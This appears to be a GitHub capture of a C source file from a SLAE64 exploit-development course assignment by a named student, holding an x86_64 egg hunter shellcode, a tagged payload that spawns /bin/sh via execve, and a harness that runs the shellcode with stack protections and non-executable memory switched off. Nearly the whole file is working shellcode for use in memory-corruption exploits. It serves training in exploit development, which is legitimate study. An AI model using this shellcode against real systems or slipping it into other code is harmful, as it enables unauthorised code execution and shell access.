Skip to content
Permalink
Branch: master
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
27 lines (20 sloc) 985 Bytes
// Student ID : SLAE64-1611
// Student Name : Jonathan "Chops" Crosby
// Assignment 3 : Egg Hunter (Linux/x86_64) Assembly
// File Name : shellcode.c
#include<stdio.h>
#include<string.h>
//compile with: gcc shellcode.c -o shellcode -fno-stack-protector -z execstack -no-pie
const unsigned char egghunter[] = \
"\x48\x31\xd2\x66\x81\xca\xff\x0f\x48\xff\xc2\x48\x31\xc0\x48\x89\xc6\x48\x83\xc0\x15\x52\x5f\x0f\x05\x3c\xf2\x74\xe6\x48\xb8\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc\x48\x89\xd7\x48\xaf\x75\xda\x48\xaf\x75\xd6\xff\xe7";
const unsigned char payload[] = \
"\xFC\xFC\xFC\xFC\xFC\xFC\xFC\xFC"
"\xFC\xFC\xFC\xFC\xFC\xFC\xFC\xFC"
"\x48\x31\xc0\x48\x83\xc0\x3b\x4d\x31\xc9\x41\x51\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x41\x51\x48\x89\xe2\x57\x48\x89\xe6\x0f\x05";
main()
{
printf("Egghunter Shellcode Length: %zu\n", strlen(egghunter));
printf("Payload Shellcode Length: %zu\n", strlen(payload));
int (*ret)() = (int(*)())egghunter;
ret();
}
You can’t perform that action at this time.